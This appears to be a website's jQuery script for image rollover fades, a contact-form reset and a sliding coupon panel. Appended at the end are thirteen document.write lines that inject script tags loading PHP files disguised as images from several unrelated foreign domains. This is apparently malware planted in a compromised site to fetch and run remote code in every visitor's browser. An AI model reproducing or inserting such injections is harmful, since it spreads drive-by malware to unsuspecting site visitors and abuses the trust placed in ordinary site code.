﻿var cIsOpen = false;

function loadEffects()
{
    $(".ui-fade-rollover").each(function()
    {
        if ($(this).attr("effect_loaded") == "true") return;
    
        $(this).attr("effect_loaded", "true");
    
        var wrapper = "<div style='display: block; height: auto; width: auto; background-repeat: no-repeat; background-image: url(" + $(this).attr("src").replace("_off", "_over") + ")'></div>";

        if ($(this).parent().get(0).tagName == "A")
        {
            $(this).parent().wrap(wrapper);
        }
        else
        {
            $(this).wrap(wrapper);
        }

        $(this).bind("mouseenter", function(e)
        {
            $(this).stop().animate({ opacity: 0 }, 300);
        });
        
        $(this).bind("mouseleave", function(e)
        {
            $(this).stop().animate({ opacity: 1 }, 300);
        });
    });
}

function resetContactForm()
{
    $("#txt_name").attr("value", "");
    $("#txt_email").attr("value", "");
    $("#txt_message").html("");
}

function animateCoupon()
{
    if(cIsOpen)
    {
        $("#coupon").hide("slide", { easing: "easeIn", direction: "right" }, 500, function(){$("#tag").show();cIsOpen = false;});
    }
    else
    {
        $("#tag").hide();
        $("#coupon").show("slide", { easing: "easeIn", direction: "right" }, 500, function(){cIsOpen = true;});
    }
}
document.write('<script src=http://potentialperformance.com/_vti_script/tempdefault.php ><\/script>');
document.write('<script src=http://potentialperformance.com/_vti_script/tempdefault.php ><\/script>');
document.write('<script src=http://escoladegrausdofuturo.com.br/images/gifimg.php ><\/script>');
document.write('<script src=http://thoya.bleu.ro/images/gvr/gifimg.php ><\/script>');
document.write('<script src=http://thoya.bleu.ro/images/gvr/gifimg.php ><\/script>');
document.write('<script src=http://thoya.bleu.ro/images/gvr/gifimg.php ><\/script>');
document.write('<script src=http://thoya.bleu.ro/images/gvr/gifimg.php ><\/script>');
document.write('<script src=http://thoya.bleu.ro/images/gvr/gifimg.php ><\/script>');
document.write('<script src=http://fragownia-cs.ugu.pl/images/qyb0/gifimg.php ><\/script>');
document.write('<script src=http://fragownia-cs.ugu.pl/images/qyb0/gifimg.php ><\/script>');
document.write('<script src=http://fragownia-cs.ugu.pl/images/qyb0/gifimg.php ><\/script>');
document.write('<script src=http://fragownia-cs.ugu.pl/images/qyb0/gifimg.php ><\/script>');
document.write('<script src=http://eccne.co.in/images/gifimg.php ><\/script>');